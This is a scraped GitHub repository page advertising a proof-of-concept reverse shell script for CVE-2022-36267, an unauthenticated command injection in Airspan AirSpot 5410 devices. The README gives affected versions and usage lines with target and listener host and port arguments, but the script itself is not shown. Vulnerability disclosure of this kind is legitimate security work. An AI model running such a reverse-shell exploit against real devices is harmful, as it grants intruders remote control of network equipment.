CVE-2022-36267 - Airspan AirSpot 5410 Unauthenticated Remote Command Injection.

Overview

This repository contains a Proof of Concept (PoC) reverse shell script for exploiting CVE-2022-36267, a critical vulnerability in Airspan AirSpot 5410 devices. The script is a practical demonstration, complementing the in-depth analysis provided in the blog post "Airspan AirSpot 5410 - Vulnerability Report."

Affected versions

All Airspan AirSpot 5410 devices from version 0.3.4.1-4 and under.

PoC Script Usage

# Usage: python AirSpot-5410.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python AirSpot-5410.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

Video Proof of Concept

Note

FOR EDUCATIONAL PURPOSE ONLY.

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commits
AirSpot-5410.py		AirSpot-5410.py
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

AirSpot-5410.py

AirSpot-5410.py

README.md

README.md

Repository files navigation

CVE-2022-36267 - Airspan AirSpot 5410 Unauthenticated Remote Command Injection.

Overview

Affected versions

PoC Script Usage

Video Proof of Concept

Note

About

Releases

Packages

Languages

0xNslabs/CVE-2022-36267-PoC

Folders and files

Latest commit

History

AirSpot-5410.py

AirSpot-5410.py

README.md

README.md

Repository files navigation

CVE-2022-36267 - Airspan AirSpot 5410 Unauthenticated Remote Command Injection.

Overview

Affected versions

PoC Script Usage

Video Proof of Concept

Note

About

Topics

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages